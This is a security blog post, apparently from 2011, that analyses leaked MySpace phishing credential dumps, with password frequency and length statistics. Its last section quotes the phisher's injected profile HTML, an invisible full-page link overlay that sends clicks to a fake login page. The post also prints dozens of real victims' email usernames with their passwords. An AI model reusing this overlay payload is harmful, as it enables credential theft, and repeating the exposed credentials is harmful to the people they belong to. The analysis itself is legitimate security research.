{"id":572,"date":"2011-01-11T16:59:29","date_gmt":"2011-01-11T15:59:29","guid":{"rendered":"https:\/\/thebc.ch\/blog\/?p=572"},"modified":"2013-02-01T12:53:25","modified_gmt":"2013-02-01T11:53:25","slug":"analysis-of-passwords-found-by-phishing","status":"publish","type":"post","link":"https:\/\/thebc.ch\/blog\/?p=572","title":{"rendered":"Analysis of passwords found by phishing"},"content":{"rendered":"<div class='toc toc'>\n<h2>Contents<\/h2>\n<ul class='toc-odd level-1'>\n\t<li>\n\t\t<a href=\"#Abstract\">Abstract<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#The_files\">The files<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#People_and_fishing\">People and fishing<\/a>\n\t<\/li>\n\t<li>\n\t\t<a href=\"#Password_quality\">Password quality<\/a>\n\t\t<ul class='toc-even level-2'>\n\t\t\t<li>\n\t\t\t\t<a href=\"#The_30_most_used_passwords\">The 30 most used passwords<\/a>\n\t\t\t<\/li>\n\t\t\t<li>\n\t\t\t\t<a href=\"#Password_length\">Password length<\/a>\n\t\t\t<\/li>\n\t\t<\/ul>\n\t<li>\n\t\t<a href=\"#How_the_Phisher_did_it\">How the Phisher did it<\/a>\n\t<\/li>\n<\/ul>\n<\/ul>\n<\/div>\n<div class='toc-end'>&nbsp;<\/div>\n<span id=\"Abstract\"><h2>Abstract<\/h2><\/span>\n<p>Today I found a interesting article on <a title=\"http:\/\/blogs.securiteam.com\/index.php\/archives\/797\" href=\"http:\/\/blogs.securiteam.com\/index.php\/archives\/797\" rel=\"nofollow\">Myspace phishing site discloses countless usernames and passwords<\/a> on <a title=\"http:\/\/www.securiteam.com\" href=\"http:\/\/www.securiteam.com\/\" rel=\"nofollow\">SecuriTeam<\/a>. Some one must have found the user\/password combo file collected by a Phisher. It is a collection of ~57&#8217;000 User\/pass (actually email\/pass) combos. Some of them will be fake but anyway, I&#8217;ve got interested in the whole story. After some research I found the original advisory on <a title=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0270.html\" href=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0270.html\" rel=\"nofollow\">FullDisclosure<\/a> (which by the way also includes the passdump). I also Googled a bit around and found 3 more files with the name &#8220;myspace.txt&#8221;. This short analysis is based on these 4 passdumps. I really like to play with real data\u00c2\u00a0\ud83d\ude42<\/p>\n<p><a id=\"The_files\" name=\"The_files\"><\/a><\/p>\n<span id=\"The_files\"><h2>The files<\/h2><\/span>\n<table>\n<tbody>\n<tr>\n<td><strong>File<\/strong><\/td>\n<td><strong>Size<\/strong><\/td>\n<td><strong>Lines<\/strong><\/td>\n<td><strong>Unique lines<\/strong><\/td>\n<td><strong>Comment<\/strong><\/td>\n<\/tr>\n<tr>\n<td>m0<\/td>\n<td>1886347<\/td>\n<td>56590<\/td>\n<td>42575<\/td>\n<td>Original file from the advisory<\/td>\n<\/tr>\n<tr>\n<td>m1<\/td>\n<td>1405905<\/td>\n<td>45325<\/td>\n<td>43098<\/td>\n<td>found with google<\/td>\n<\/tr>\n<tr>\n<td>m2<\/td>\n<td>1527730<\/td>\n<td>48892<\/td>\n<td>46664<\/td>\n<td>found with google<\/td>\n<\/tr>\n<tr>\n<td>m3<\/td>\n<td>1527769<\/td>\n<td>48900<\/td>\n<td>46664<\/td>\n<td>found with google<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a id=\"People_and_fishing\" name=\"People_and_fishing\"><\/a><\/p>\n<span id=\"People_and_fishing\"><h2>People and fishing<\/h2><\/span>\n<p>Some people realized that they are going to be phished\u00c2\u00a0\ud83d\ude42<\/p>\n<pre>fuck.off.seriousy:computergek\r\nyou really really suck:fuckoffthisissomethingadickwoulddo\r\nyouguyssuck@fuckoff.com:getalifeubastard\r\nfuckyou@fuckoff.com:diephisher  lollol<\/pre>\n<p>Other peoples don&#8217;t. They actually try to login many times (the number before the combo is the number of logins they tried):<\/p>\n<pre>[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30\r\n    18 amandamyspace_email@xxxx.com:josh2202\r\n    18 blndygrl82@xxxxxx.com:luvyachris\r\n    18 dncrj629@xxxxxxxx.net:julie\r\n    18 dtonesuperstarr@xxxxxxxx.com:carla09\r\n    18 eathenallen@xxx.com:candisma3\r\n    18 haleytrash@xxxxxx.com:buttcrack.\r\n    18 iamtyler44@xxxxxx.com:tjh123\r\n    18 katyandjan@xxxxxxx.net:meeow1\r\n    18 latinagirlveronica@xxxxx.com:teddy123\r\n    18 molly_doglover@xx.com:1007404mkk\r\n    20 alicewang93@xxxxxxxxxx.com:puppies11\r\n    21 b_radschenk@xxxxx.com:ford08\r\n    21 gogirl55546@xxxxxx.com:emmakauf!\r\n    21 helenichero617@xxx.com:christian\r\n    21 larissapasifull@xxxxxxx.com:16188s\r\n    21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways\r\n    21 yellowducks4you@xxx.net:norton13\r\n    22 zjs1daddy@xxxxx.com:freeshit4me\r\n    23 jbacaphoto@xxxxxxxxx.net:tiger2\r\n    23 twisted_and_frayed@xxxxxx.com:danny12031986\r\n    24 cathysurmick@xxxx.com:travis13\r\n    24 rlsorey@xx.com:abc123\r\n    24 the_beast525@xxxx.com:zander1\r\n    24 typ.1985@xxxxxxx.com:Mikhail\r\n    27 amandapandapixie@xx.com:panda1\r\n    36 aaron.braesicke@xxxxxx.net:dragon1\r\n    40 prissykatie2@xxxxx.com:swimmer1\r\n    45 southpark1@xxxxxxx.com:ajizzle!\r\n   262\r\n   437\u00c2\u00a0:\r\n[system@nord myspace]#<\/pre>\n<p>&nbsp;<\/p>\n<p><a id=\"Password_quality\" name=\"Password_quality\"><\/a><\/p>\n<span id=\"Password_quality\"><h2>Password quality<\/h2><\/span>\n<p><a id=\"The_30_most_used_passwords\" name=\"The_30_most_used_passwords\"><\/a><\/p>\n<span id=\"The_30_most_used_passwords\"><h3>The 30 most used passwords<\/h3><\/span>\n<p>from the original list m0:<\/p>\n<div class=\"codecolorer-container text default\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">&nbsp;[system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<pre>    13 love123\r\n    13 michael1\r\n    13 password2\r\n    14 asshole\r\n    14 bitch\r\n    14 fuck you\r\n    14 iloveyou\r\n    14 jordan1\r\n    14 qwerty1\r\n    15 123456a\r\n    15 babygirl1\r\n    15 blink182\r\n    15 bubbles1\r\n    15 princess1\r\n    16 123abc\r\n    16 iloveyou2\r\n    17 123456\r\n    17 nicole1\r\n    18 football1\r\n    18 number1\r\n    21 password\r\n    22 i\r\n    24 fuckyou1\r\n    24 myspace1\r\n    28 iloveyou1\r\n    29 monkey1\r\n    34 fuckyou\r\n    56 abc123\r\n    75 password1\r\n   981<\/pre>\n<p>[system@nord myspace]#<\/p>\n<p><a id=\"Password_length\" name=\"Password_length\"><\/a><\/p>\n<span id=\"Password_length\"><h3>Password length<\/h3><\/span>\n<div>\n<div>\n<p><a href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/500px-phishing_password_length\/\" rel=\"attachment wp-att-585\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-585\" title=\"500px-Phishing_password_length\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length.png\" alt=\"\" width=\"500\" height=\"246\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length.png 500w, https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length-300x147.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<div>\n<div><a title=\"Enlarge\" href=\"https:\/\/192.168.100.2\/wiki\/index.php\/File:Phishing_password_length.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/192.168.100.2\/wiki\/skins\/common\/images\/magnify-clip.png\" alt=\"\" width=\"15\" height=\"11\" \/><\/a><\/div>\n<p>Password length<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div>\n<div>\n<p><a href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/500px-phishing_password_length_chart\/\" rel=\"attachment wp-att-586\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-586\" title=\"500px-Phishing_password_length_chart\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart.png\" alt=\"\" width=\"500\" height=\"343\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart.png 500w, https:\/\/thebc.ch\/upload\/2011\/01\/500px-Phishing_password_length_chart-300x205.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<div>\n<div><a title=\"Enlarge\" href=\"https:\/\/192.168.100.2\/wiki\/index.php\/File:Phishing_password_length_chart.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/192.168.100.2\/wiki\/skins\/common\/images\/magnify-clip.png\" alt=\"\" width=\"15\" height=\"11\" \/><\/a><\/div>\n<p>Password length chart<\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>BUT: if we lock at the 20 character passwords you will see, that these aren&#8217;t actually passwords:<\/p>\n<pre>duanne1105duanne1105\r\nyoureastupidjerkface\r\nieatshitforbreakfest\r\n1andrewlennon@yahcgg\r\nfishyp@sbcglobal.net\r\nsuck my dick, pricks\r\nfuckinhackersgo2hell\r\nnice try you asshole\r\nILLHACKYOURMOMSPUSSY\r\nsuckmycockits9inches\r\nworthlesspieceofshit\r\nm loged in you bitch\r\nURADUMBFUKKHAKKERHAH\r\nCoopsieee3Coopsieee3\r\nu suck i aint stupid\r\nheymrhackerurafaggot\r\nfuck you hack wanker\r\njfduoa932p[1rguinfkl\r\nkaykay1211loserific1\r\nstfu and get a life.\r\nthis is fake dipshit\r\nfuck you and yo mama\r\nmind ya own business\r\nyoumustthinkimstupid<\/pre>\n<p><a id=\"How_the_Phisher_did_it\" name=\"How_the_Phisher_did_it\"><\/a><\/p>\n<span id=\"How_the_Phisher_did_it\"><h2>How the Phisher did it<\/h2><\/span>\n<div>\n<div>\n<p><a href=\"https:\/\/thebc.ch\/blog\/572\/analysis-of-passwords-found-by-phishing\/400px-phishing_myspace_login\/\" rel=\"attachment wp-att-587\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-587\" title=\"400px-Phishing_myspace_login\" src=\"http:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login.png\" alt=\"\" width=\"400\" height=\"376\" srcset=\"https:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login.png 400w, https:\/\/thebc.ch\/upload\/2011\/01\/400px-Phishing_myspace_login-300x282.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<div>\n<div><a title=\"Enlarge\" href=\"https:\/\/192.168.100.2\/wiki\/index.php\/File:Phishing_myspace_login.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/192.168.100.2\/wiki\/skins\/common\/images\/magnify-clip.png\" alt=\"\" width=\"15\" height=\"11\" \/><\/a><\/div>\n<p><a title=\"http:\/\/64.233.183.104\/search?q=cache:u2RtwlpBqFcJ:www.marcolano.com\/login\/+inurl:marcolano&amp;hl=en&amp;gl=uk&amp;ct=clnk&amp;cd=2\" href=\"http:\/\/64.233.183.104\/search?q=cache:u2RtwlpBqFcJ:www.marcolano.com\/login\/+inurl:marcolano&amp;hl=en&amp;gl=uk&amp;ct=clnk&amp;cd=2\" rel=\"nofollow\">Google-Cache<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<ul>\n<li>from <a title=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0321.html\" href=\"http:\/\/seclists.org\/fulldisclosure\/2007\/Jan\/0321.html\" rel=\"nofollow\">Waldo<\/a><\/li>\n<\/ul>\n<p>Hmm&#8230; Oh no is very easy, yes very easy what he is doing. He left some traces on some of the &#8220;cracked&#8221; accounts, I was expectig of somebody to comment earlier since I&#8217;ve been a couple of hours since the initial post.<\/p>\n<p>When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account\u00c2\u00a0\ud83d\ude1b<\/p>\n<p>&nbsp;<\/p>\n<div class=\"codecolorer-container text default\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">&nbsp;HOLA!!!!&amp;lt;a style=&quot;text-decoration:none;position: absolute;top:1px;left:1px;&quot; href=&quot;&lt;a title=&quot;http:\/\/marcolano.com\/login\/&quot; href=&quot;http:\/\/marcolano.com\/login\/&quot; rel=&quot;nofollow&quot;&gt;http:\/\/marcolano.com\/login\/&lt;\/a&gt;&quot;&amp;gt; &amp;lt;img style=&quot;border-width:0px;width:2024px; height:1768px;&quot; src=&quot;&lt;img src=&quot;http:\/\/x.myspace.com\/images\/clear.gif&quot; alt=&quot;clear.gif&quot; \/&gt;&quot;&amp;gt; &amp;lt;\/a&amp;gt;&amp;lt;a style=&quot;text-decoration:none;position: absolute;top:1px;left:1px;&quot; href=&quot;&lt;a title=&quot;http:\/\/marcolano.com\/login\/&quot; href=&quot;http:\/\/marcolano.com\/login\/&quot; rel=&quot;nofollow&quot;&gt;http:\/\/marcolano.com\/login\/&lt;\/a&gt;&quot;&amp;gt; &amp;lt;img style=&quot;border-width:0px;width:2024px; height:1768px;&quot; src=&quot;&lt;img src=&quot;http:\/\/x.myspace.com\/images\/clear.gif&quot; alt=&quot;clear.gif&quot; \/&gt;&quot;&amp;gt; &amp;lt;\/a&amp;gt;&amp;lt;embed allowScriptAccess=&quot;never&quot; allowNetworking=&quot;internal&quot; enableJSURL=&quot;false&quot; enableHREF=&quot;false&quot; saveEmbedTags=&quot;true&quot; src=&quot;&lt;a title=&quot;http:\/\/www...\/mov\/cid_3277_f.mov&quot; href=&quot;http:\/\/www...\/mov\/cid_3277_f.mov&quot; rel=&quot;nofollow&quot;&gt;http:\/\/www...\/mov\/cid_3277_f.mov&lt;\/a&gt;&quot; width=&quot;1&quot; height=&quot;1&quot;&amp;gt;<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So&#8230; we are in fact not talking about a stupid phishing website for those who still beleive that.<\/p>\n<p>Regards Waldo<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>and KF enhance:<\/li>\n<\/ul>\n<p><a title=\"http:\/\/www.ninjahype.org\/mov\/\" href=\"http:\/\/www.ninjahype.org\/mov\/\" rel=\"nofollow\">http:\/\/www.ninjahype.org\/mov\/<\/a><\/p>\n<p>nameHREFTrack<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Abstract Today I found a interesting article on Myspace phishing site discloses countless usernames and passwords on SecuriTeam. Some one must have found the user\/password combo file collected by a Phisher. It is a collection of ~57&#8217;000 User\/pass (actually email\/pass) &hellip; <a href=\"https:\/\/thebc.ch\/blog\/?p=572\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-572","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=572"}],"version-history":[{"count":10,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":2662,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/572\/revisions\/2662"}],"wp:attachment":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}